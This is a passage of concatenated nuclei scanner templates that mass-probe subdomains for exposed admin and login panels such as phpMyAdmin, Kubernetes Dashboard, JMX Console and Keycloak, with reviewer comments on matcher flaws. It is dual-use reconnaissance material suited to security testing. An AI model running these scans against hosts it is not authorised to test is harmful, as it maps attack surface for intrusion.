/Templates/Exposed-Panels/jira-detect-3.yaml:
--------------------------------------------------------------------------------
# Detects Jira via /login.jsp (variant 3 of 3).
# NOTE(review): the id contains a space; confirm the nuclei release in use
# accepts it.
id: jira-detect 3

info:
  name: Detect Jira Issue Management Software
  author: pdteam,philippedelteil
  severity: info
  tags: panel,jira

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /login.jsp HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # /login.jsp is a common path and the phrase is generic, so this is the
      # loosest of the three variants; verify hits.
      - type: word
        words:
          - "Project Management Software"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/jiva-admin-exposure.yaml:
--------------------------------------------------------------------------------
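# Detects the Jive Administration Console login page at /admin/login.jsp.
# NOTE(review): the id still reads "active-admin-exposure", which does not
# describe this check and may collide with another template. It is left as is
# so existing result filters keep working; rename it deliberately.
id: active-admin-exposure

info:
  # Was "ActiveAdmin Admin Dasboard Exposure": copied from another template
  # and misspelled. The name now states what the matcher looks for.
  name: Jive Administration Console Exposure
  author: pdteam
  severity: info
  tags: panel
#Try This /admin;/main.jsp
requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      # Unlike the sibling templates, no User-Agent header is sent here.
      - |
        GET /admin/login.jsp HTTP/1.1
        Host: {{Subdomains}}
    matchers:
      - type: word
        words:
          - "Jive Administration Console"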
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/jmx-console.yaml:
--------------------------------------------------------------------------------
# Detects the JBoss JMX management console at /jmx-console/.
id: jmx-console
info:
  name: JMX Console
  author: yashanand155
  severity: low
  tags: panel,jmx

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /jmx-console/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # Status is not checked, so it is unclear from a hit alone whether the
      # console answered without authentication; confirm per finding.
      - type: word
        words:
          - JBoss JMX Management Console
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/joomla-panel.yaml:
--------------------------------------------------------------------------------
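# Detects the Joomla administrator login page at /administrator/.
id: joomla-panel

info:
  name: Joomla Panel
  author: its0x08
  severity: info
  tags: panel,joomla

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /administrator/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          # An empty-string alternative was removed from this list. Under
          # `condition: or` it is a substring of any response, so every host in
          # the wordlist would have been reported as a Joomla panel.
          # NOTE(review): the empty entry was probably a marker lost in
          # transcription; add it back once the original string is known.
          - '/administrator/templates/isis/images/joomla.png'
        condition: or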
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/kafka-connect-ui.yaml:
--------------------------------------------------------------------------------
# Detects the Kafka Connect UI on the site root.
id: kafka-connect-ui

info:
  name: Apache Kafka Connect UI Exposure
  author: pdteam
  severity: low
  tags: panel,kafka

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          - 'Kafka Connect UI'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/kafka-monitoring.yaml:
--------------------------------------------------------------------------------
# Detects a Kafka Monitor web UI on the site root.
id: kafka-monitoring

info:
  name: Apache Kafka Monitor Exposure
  author: pdteam
  severity: low
  tags: panel,kafka

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # No `condition` is given, so either string is enough (nuclei's default
      # within a word matcher is `or`). The leading '>' ties each word to the
      # end of an HTML tag.
      - type: word
        words:
          - '>KafkaMonitor'
          - '>Kafka Monitor GUI'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/kafka-topics-ui.yaml:
--------------------------------------------------------------------------------
# Detects the Kafka Topics UI on the site root.
id: kafka-topics-ui

info:
  name: Apache Kafka Topics UI Exposure
  author: pdteam
  severity: low
  tags: panel,kafka

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          - 'Kafka Topics UI - Browse Kafka Data'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/key-cloak-admin-panel-2.yaml:
--------------------------------------------------------------------------------
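# Detects the Keycloak admin entry point at /auth/admin (the sibling template
# probes /auth/admin/master/console/).
# NOTE(review): the id contains a space; confirm the nuclei release in use
# accepts it.
id: key-cloak-admin-panel 2

info:
  name: Keycloak Admin Panel
  author: incogbyte,righettod
  severity: info
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /auth/admin HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          # An empty-string alternative was removed from this list. Under
          # `condition: or` it is a substring of any body, so every response
          # would have counted as a Keycloak panel.
          - "keycloak"
        part: body
        condition: or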
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/key-cloak-admin-panel.yaml:
--------------------------------------------------------------------------------
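# Detects the Keycloak admin console at /auth/admin/master/console/ (the
# sibling template probes /auth/admin).
# NOTE(review): the id contains a space; confirm the nuclei release in use
# accepts it.
id: key-cloak-admin-panel 1

info:
  name: Keycloak Admin Panel
  author: incogbyte,righettod
  severity: info
  tags: panel

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /auth/admin/master/console/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          # An empty-string alternative was removed from this list. Under
          # `condition: or` it is a substring of any body, so every response
          # would have counted as a Keycloak panel.
          - "keycloak"
        part: body
        condition: or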
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/kronos-workforce-central.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response to GET /wfc/portal contains the
# "Kronos Workforce Central" string. Host comes from the Subdomains payload file.
id: kronos-workforce-central

info:
  name: Kronos Workforce Central Panel
  author: emadshanab
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /wfc/portal HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # Word match only; no status code is checked.
      - type: word
        words:
          - 'Kronos Workforce Central'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/kubernetes-dashboard.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response to GET / contains "Kubernetes Dashboard".
# The Host header is filled from each entry of the Subdomains payload file.
id: kubernetes-dashboard

info:
  name: Kubernetes Console Exposure
  author: pdteam
  severity: low
  tags: panel,kubernetes,devops

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # A hit shows the dashboard page is served; it does not show whether login is enforced.
      - type: word
        words:
          - "Kubernetes Dashboard"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/lancom-router-panel.yaml:
--------------------------------------------------------------------------------
# Reports a match when GET / returns status 200 and the response contains
# "LANCOM 1790VA-4G". The Host header is filled from the Subdomains payload file.
id: lancom-router-panel

info:
  name: Lancom Router Panel
  author: __Fazal
  severity: info
  tags: panel,lancom

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    # Both matchers below must succeed.
    matchers-condition: and
    matchers:
      - type: status
        status: [200]

      # Matches one model string only; other LANCOM models are not covered by this word.
      - type: word
        words:
          - "LANCOM 1790VA-4G"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/livezilla-login-panel.yaml:
--------------------------------------------------------------------------------
# Reports a match when GET /mobile/index.php returns status 200 and the response
# contains "LiveZilla". The Host header is filled from the Subdomains payload file.
id: livezilla-login-panel

info:
  name: Livezilla login detect
  author: __Fazal
  severity: info
  tags: panel,livezilla

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /mobile/index.php HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    # Both matchers below must succeed.
    matchers-condition: and
    matchers:
      - type: status
        status: [200]

      - type: word
        words:
          - 'LiveZilla'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/manage-engine-admanager-panel.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response to GET /authorization.do contains
# "ManageEngine - ADManager Plus". Host comes from the Subdomains payload file.
id: manage-engine-admanager-panel

info:
  name: Manage Engine ADManager Panel
  author: PR3R00T
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /authorization.do HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      # Word match only; no status code is checked.
      - type: word
        words:
          - "ManageEngine - ADManager Plus"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/mantis-detect.yaml:
--------------------------------------------------------------------------------
# Reports a match when the body returned for GET /login_page.php contains "MantisBT".
# The Host header is filled from each entry of the Subdomains payload file.
id: mantis-detect

info:
  name: Mantis portal detection
  author: makyotox
  severity: info
  tags: panel,mantis

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /login_page.php HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers:
      # Body word match only; no status code is checked.
      - type: word
        words:
          - "MantisBT"
        part: body
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/netlify-cms.yaml:
--------------------------------------------------------------------------------
# Reports a match when GET /admin/index.html returns status 200 and the body
# contains "Netlify CMS". The Host header is filled from the Subdomains payload file.
id: netlify-cms

info:
  name: Netlify CMS Admin Panel
  author: sullo
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /admin/index.html HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    # Both matchers below must succeed.
    matchers-condition: and
    matchers:
      - type: status
        status: [200]
      - type: word
        words:
          - "Netlify CMS"
        part: body
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/netscalar-aaa-login.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response to GET /logon/LogonPoint/tmindex.html contains
# "NetScaler AAA". The Host header is filled from the Subdomains payload file.
# NOTE(review): id and name spell the product "NetScalar" while the matched string is
# "NetScaler AAA"; the request path and matcher are the same as in
# netscaler-aaa-login.yaml, so the two templates report the same panels.
id: netscalar-aaa-login

info:
  name: NetScalar AAA Login Panel
  author: dhiyaneshDk
  severity: info
  reference: https://www.exploit-db.com/ghdb/6898
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /logon/LogonPoint/tmindex.html HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      - type: word
        words:
          - "NetScaler AAA"
        # With a single word, `and` and `or` behave the same.
        condition: and
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/netscaler-aaa-login.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response to GET /logon/LogonPoint/tmindex.html contains
# "NetScaler AAA". The Host header is filled from the Subdomains payload file.
id: netscaler-aaa-login

info:
  name: NetScaler AAA Login Panel
  author: dhiyaneshDk
  severity: info
  reference: https://www.exploit-db.com/ghdb/6898
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /logon/LogonPoint/tmindex.html HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers:
      - type: word
        words:
          - "NetScaler AAA"
        # With a single word, `and` and `or` behave the same.
        condition: and
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/netscaler-gateway.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response to GET /vpn/index.html contains
# "Netscaler Gateway". The Host header is filled from the Subdomains payload file.
id: netscaler-gateway

info:
  name: Netscaler gateway
  author: joeldeleep
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /vpn/index.html HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      # Word matching is case-sensitive unless configured otherwise, so pages that
      # spell the product "NetScaler Gateway" will not match — verify the casing.
      - type: word
        words:
          - Netscaler Gateway
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/octoprint-login-1.yaml:
--------------------------------------------------------------------------------
# Reports a match when GET / returns status 200 and the response contains
# "OctoPrint Login". The Host header is filled from the Subdomains payload file.
# NOTE(review): the id contains a space; nuclei releases that validate template ids
# may reject it — confirm against the version in use.
id: octoprint-panel 1

info:
  name: OctoPrint Login
  author: affix
  severity: info
  tags: octoprint,panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    # Both matchers below must succeed.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'OctoPrint Login'
      - type: status
        status: [200]
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/octoprint-login-2.yaml:
--------------------------------------------------------------------------------
# Reports a match when GET /login/ returns status 200 and the response contains
# "OctoPrint Login". The Host header is filled from the Subdomains payload file.
# NOTE(review): the id contains a space; nuclei releases that validate template ids
# may reject it — confirm against the version in use.
id: octoprint-panel 2

info:
  name: OctoPrint Login
  author: affix
  severity: info
  tags: octoprint,panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /login/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    # Both matchers below must succeed.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'OctoPrint Login'
      - type: status
        status: [200]
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/oipm-detect.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response to GET /PMUser/ contains
# "One Identity Password Manager". Host comes from the Subdomains payload file.
id: oipm-detect
info:
  name: One Identity Password Manager detection
  author: nodauf
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /PMUser/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      # Word match only; no status code is checked.
      - type: word
        words:
          - "One Identity Password Manager"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/oki-data.yaml:
--------------------------------------------------------------------------------
# Reports a match when GET /status.htm returns status 200 and the response contains
# "Oki Data Corporation". The Host header is filled from the Subdomains payload file.
id: oki-data-corporation

info:
  name: Oki Data Corporation
  author: dhiyaneshDK
  severity: info
  reference: https://www.exploit-db.com/ghdb/5937
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /status.htm HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    # Both matchers below must succeed.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Oki Data Corporation'
      - type: status
        status: [200]
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/openerp-database.yaml:
--------------------------------------------------------------------------------
# Reports a match when GET /web/database/selector/ returns status 200 and the
# response contains "Odoo". The Host header is filled from the Subdomains payload file.
id: openerp-database

info:
  name: OpenERP database instances
  author: impramodsargar
  severity: info
  tags: openerp,panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /web/database/selector/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    # Both matchers below must succeed.
    matchers-condition: and
    matchers:
      # "Odoo" is a short, generic product word; a 200 page that merely mentions it also matches.
      - type: word
        words:
          - 'Odoo'

      - type: status
        status: [200]
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/parallels-html-client.yaml:
--------------------------------------------------------------------------------
# Reports a match when the body returned for GET /RASHTML5Gateway/ contains
# "Parallels HTML5 Client". Host comes from the Subdomains payload file.
id: parallels-html-client

info:
  name: Parallels HTML5 Client
  author: pdteam
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /RASHTML5Gateway/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      # Body word match only; no status code is checked.
      - type: word
        words:
          - "Parallels HTML5 Client"
        part: body
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/pentaho-panel.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response to GET /pentaho/Login contains
# "Pentaho User Console - Login". Host comes from the Subdomains payload file.
id: pentaho-panel

info:
  name: Pentaho Panel
  author: princechaddha,dhiyaneshDK
  severity: info
  metadata:
    shodan-query: 'pentaho'
  tags: panel,pentaho

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /pentaho/Login HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    # Only one matcher is listed, so `and` has nothing to combine; a status matcher
    # may have been intended — confirm.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Pentaho User Console - Login'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phpmyadmin-panel-1.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response to GET /phpmyadmin/ contains "phpMyAdmin".
# The Host header is filled from each entry of the Subdomains payload file.
# NOTE(review): the id contains a space; nuclei releases that validate template ids
# may reject it — confirm against the version in use.
id: phpmyadmin-panel 1

info:
  name: phpMyAdmin Panel
  author: pdteam
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /phpmyadmin/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      # Word match only, no status check: an error page that echoes the requested
      # path would not match (lower-case path), but any page naming the product does.
      - type: word
        words:
          - "phpMyAdmin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phpmyadmin-panel-10.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response to GET /web/phpmyadmin/ contains "phpMyAdmin".
# The Host header is filled from each entry of the Subdomains payload file.
# NOTE(review): the id contains a space; nuclei releases that validate template ids
# may reject it — confirm against the version in use.
id: phpmyadmin-panel 10

info:
  name: phpMyAdmin Panel
  author: pdteam
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /web/phpmyadmin/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      # Word match only; no status code is checked.
      - type: word
        words:
          - "phpMyAdmin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phpmyadmin-panel-11.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response to GET /xampp/phpmyadmin/ contains "phpMyAdmin".
# The Host header is filled from each entry of the Subdomains payload file.
# NOTE(review): the id contains a space; nuclei releases that validate template ids
# may reject it — confirm against the version in use.
id: phpmyadmin-panel 11

info:
  name: phpMyAdmin Panel
  author: pdteam
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /xampp/phpmyadmin/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      # Word match only; no status code is checked.
      - type: word
        words:
          - "phpMyAdmin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phpmyadmin-panel-2.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response to GET /admin/phpmyadmin/ contains "phpMyAdmin".
# The Host header is filled from each entry of the Subdomains payload file.
# NOTE(review): the id contains a space; nuclei releases that validate template ids
# may reject it — confirm against the version in use.
id: phpmyadmin-panel 2

info:
  name: phpMyAdmin Panel
  author: pdteam
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /admin/phpmyadmin/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      # Word match only; no status code is checked.
      - type: word
        words:
          - "phpMyAdmin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phpmyadmin-panel-3.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response to GET /_phpmyadmin/ contains "phpMyAdmin".
# The Host header is filled from each entry of the Subdomains payload file.
# NOTE(review): the id contains a space; nuclei releases that validate template ids
# may reject it — confirm against the version in use.
id: phpmyadmin-panel 3

info:
  name: phpMyAdmin Panel
  author: pdteam
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /_phpmyadmin/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      # Word match only; no status code is checked.
      - type: word
        words:
          - "phpMyAdmin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phpmyadmin-panel-4.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response to
# GET /administrator/components/com_joommyadmin/phpmyadmin/ contains "phpMyAdmin".
# The Host header is filled from each entry of the Subdomains payload file.
# NOTE(review): the id contains a space; nuclei releases that validate template ids
# may reject it — confirm against the version in use.
id: phpmyadmin-panel 4

info:
  name: phpMyAdmin Panel
  author: pdteam
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /administrator/components/com_joommyadmin/phpmyadmin/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      # Word match only; no status code is checked.
      - type: word
        words:
          - "phpMyAdmin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phpmyadmin-panel-5.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response to GET /apache-default/phpmyadmin/ contains
# "phpMyAdmin". The Host header is filled from the Subdomains payload file.
# NOTE(review): the id contains a space; nuclei releases that validate template ids
# may reject it — confirm against the version in use.
id: phpmyadmin-panel 5

info:
  name: phpMyAdmin Panel
  author: pdteam
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /apache-default/phpmyadmin/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      # Word match only; no status code is checked.
      - type: word
        words:
          - "phpMyAdmin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phpmyadmin-panel-6.yaml:
--------------------------------------------------------------------------------
# Reports a match when the response to GET /blog/phpmyadmin/ contains "phpMyAdmin".
# The Host header is filled from each entry of the Subdomains payload file.
# NOTE(review): the id contains a space; nuclei releases that validate template ids
# may reject it — confirm against the version in use.
id: phpmyadmin-panel 6

info:
  name: phpMyAdmin Panel
  author: pdteam
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): machine-specific absolute path; it will not resolve on another host.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /blog/phpmyadmin/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
    matchers:
      # Word match only; no status code is checked.
      - type: word
        words:
          - "phpMyAdmin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phpmyadmin-panel-7.yaml:
